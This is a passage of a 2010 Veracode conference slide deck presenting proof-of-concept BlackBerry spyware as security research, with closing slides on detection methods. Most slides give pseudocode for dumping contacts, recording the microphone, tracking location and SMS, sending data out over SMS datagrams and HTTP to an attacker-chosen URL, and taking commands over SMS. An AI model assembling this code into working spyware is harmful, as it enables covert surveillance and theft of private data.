  • 36. Dump Contact Information  API – javax.microedition.pim – net.rim.blackberry.API.pdap  Pseudocode PIM pim = PIM.getInstance(); BlackBerryPIMList contacts = (BlackBerryPIMList) pim.openPIMList(PIM.CONTACT_LIST, PIM.READ_ONLY); Enumeration eContacts = contacts.items(); Contact contact = (Contact) eContacts.nextElement(); if (contacts.isSupportedField(Contact.EMAIL)) { if (contact.countValues(Contact.EMAIL) > 0) email = contact.getString(Contact.EMAIL, 0); } © 2010 Veracode, Inc. 36
  • 37. Dump Microphone  API – javax.microedition.media.control – javax.microedition.media.manager – javax.microedition.media.player  Pseudocode Player p = Manager.createPlayer("capture://audio"); RecordControl rc = (RecordControl)p.getControl("RecordControl"); ByteArrayOutputStream os = new ByteArrayOutputStream(); rc.setRecordStream(os); rc.startRecord(); © 2010 Veracode, Inc. 37
  • 38. Location Listener  Create the class that implements LocationListener Interface  Get LocationProvider instance  Add LocationListener  API – javax.microedition.location.LocationProvider.getInstance – javax.microedition.location.LocationProvider.setLocationListener  Pseudocode ll = new LocListener(); lp = LocationProvider.getInstance(null); lp.setLocationListener(ll, 1, 1, 1); © 2010 Veracode, Inc. 38
  • 39. SMS Outbound Listener  Create class that implements “SendListener” interface  Add the SendListener  API – net.rim.blackberry.api.sms.SMS – javax.wireless.messaging.TextMessage  Pseudocode sl = new SMSOUTListener(); SMS.addSendListener(sl); © 2010 Veracode, Inc. 39
  • 40. PIM Listener  Create the class that implements PIMListListener Interface  Open Target PIMList and Add PIMListListener  API – javax.microedition.pim.PIM.getInstance() – net.rim.blackberry.api.pdap.BlackBerryPIMList.addListener  Pseudocode pl = new PhoneLogger(); pim = PIM.getInstance(); contacts = (BlackBerryPIMList) pim.openPIMList(PIM.CONTACT_LIST, PIM.READ_ONLY); contacts.addListener(piml); © 2010 Veracode, Inc. 40
  • 41. SMS Datagram Exfiltration  API – javax.microedition.io.Connector – javax.microedition.io.DatagramConnection – javax.microedition.io.Datagram  Pseudocode DatagramConnection dc = (DatagramConnection)Connector.open("sms://"+this.pnum+":3590 "); Datagram d = dc.newDatagram(dc.getMaximumLength()); byte[] buf = msg.getBytes(); d.setData(buf, 0, buf.length); d.write(buf, 0, buf.length); dc.send(d); © 2010 Veracode, Inc. 41
  • 42. HTTP Get/Post Exfiltration  API – javax.microedition.io.Connector – javax.microedition.io.HttpConnection  Pseudocode c = (HttpConnection)Connector.open("http://"+this.url+"/“+msg); rc = c.getResponseCode(); if (rc != HttpConnection.HTTP_OK) { c.setRequestMethod(HttpConnection.POST); c.setRequestProperty("User-Agent", "BBSpyware|"+msg); c.setRequestProperty("Content-Language", "en-US"); os = c.openOutputStream(); os.write(msg.getBytes()); © 2010 Veracode, Inc. 42
  • 43. Threaded Exfiltration  Listener based exfiltration methods use separate thread  Doesn‟t freeze UI interface  Queues messages outbound if network is slow  ThreadedSend extends Thread class  Uses run() method to call exfiltrate() © 2010 Veracode, Inc. 43
  • 44. Command and Control  initCandC(int a) – Initializes inbound SMS listener if passed a == 1 – Kills spyware otherwise – Listens for commands and acts accordingly TXSDIE TXSPHLON TXSPHLOFF TXSPIMON TXSPIMOFF TXSSLINON TXSSLINOFF TXSSLOUTON TXSSLOUTOFF TXSGLON TXSGLOFF TXSEXFILSMS TXSEXFILSMSDG TXSEXFILEMAIL TXSEXFILGET TXSEXFILPOST TXSEXFILTCP TXSEXFILUDP TXSDUMPCON TXSDUMPGPS TXSDUMPPL TXSDUMPEMAIL TXSDUMPMIC TXSIP:[IP] TXSEM:[EMAIL] TXSPORT[PORT] TXSPHONE:[PN] TXSURL[URL] TXSGTIME:[N] TXSPING © 2010 Veracode, Inc. 44
  • 45. Methods of Detection and Future Work © 2010 Veracode, Inc. 45
  • 46. Methods of Detection  Additional Operating System Prompts – Remove the “Trust Application” prompt requiring individual configuration  Signature Based – This is how the current anti-virus world is failing  Sandbox Based Execution Heuristics – Still requires execution in a sandbox and is reactive – Can‟t ensure complete execution  Static Decompilation and Analysis – Enumeration of sources of sensitive taint and exfiltration sinks – Control/Data flow mapping for tracing sensitive taint from source to sink – Compare findings against expected values © 2010 Veracode, Inc. 46
  • 47. Future Work (Offensive AND Defensive)  Reverse engineer .cod file format  Continued research into unobstructed installation methods (requires exploitation)  Infect PC with virus that acts as distribution hub  Research additional exfiltration methods for tunneling without prompting © 2010 Veracode, Inc. 47
  • 49. Conclusion  Mobile spyware is trivial to write  Minimal methods of real time eradication or detection of spyware type activities  Security model of mobile platforms too loose  No easy/automated way to confirm for ourselves what the applications are actually doing  We are currently trusting the vendor application store provider for the majority of our mobile device security © 2010 Veracode, Inc. 49
  • 50. The Monkey Steals the Berries! Questions? © 2010 Veracode, Inc. 50